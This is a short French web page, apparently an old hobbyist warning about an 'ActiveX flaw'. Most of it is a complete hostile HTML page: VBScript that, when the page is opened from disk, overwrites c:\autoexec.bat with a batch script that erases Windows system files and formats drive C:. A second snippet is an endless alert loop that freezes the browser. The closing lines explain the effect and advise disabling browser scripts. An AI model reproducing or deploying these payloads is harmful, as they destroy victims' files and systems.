Faille ActiveX
Je vais maintenant
vous démontrer que votre machine ne tient qu'à un fil si vous
n'êtes pas un minimum vigilant en surfant sur la toile !
Voici comment
votre disque dur ne pourrait plus redémarrer après la visite d'une
page:
<html>
<head>
<title>Test</title>
</head>
<body>
<script language="VBScript">
if location.protocol = "file:" then
Set FSO = CreateObject("scripting.FileSystemObject")
HPath = Replace(location.href, "/", "\")
HPath = Replace(HPath, "file:\\\", "")
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\autoexec.bat", 2, False)
BatFile.writeLine "@echo off"
BatFile.writeLine "erase c:\windows\*.???"
BatFile.writeLine "erase c:\windows\system\*.???"
BatFile.writeLine "erase c:\*.???"
BatFile.writeLine "Cls"
BatFile.writeLine "echo Un petit reformattage s'impose !"
BatFile.writeLine "format c:"
BatFile.writeLine ":hack"
BatFile.writeLine "echo GoodBye !"
BatFile.writeLine "goto hack"
BatFile.Close
end if
</script>
</body>
</html>
<html>
<body>
<script>while(1){alert('Erreur: Veuillez redémarrer.');}</script>
</body>
</html>
Ce script correspond à
une page web hostile qui aurra pour effet de vous remplacer votre fichier autoexec.bat
dans c:
(celui qui démarre votre ordi), par un virus codé en batch, qui
supprimera tous les fichiers vitaux de l'ordi au démarrage du disque.
Pour éviter ceci,
désactivez l'affichage des scripts de votre navigateur.
|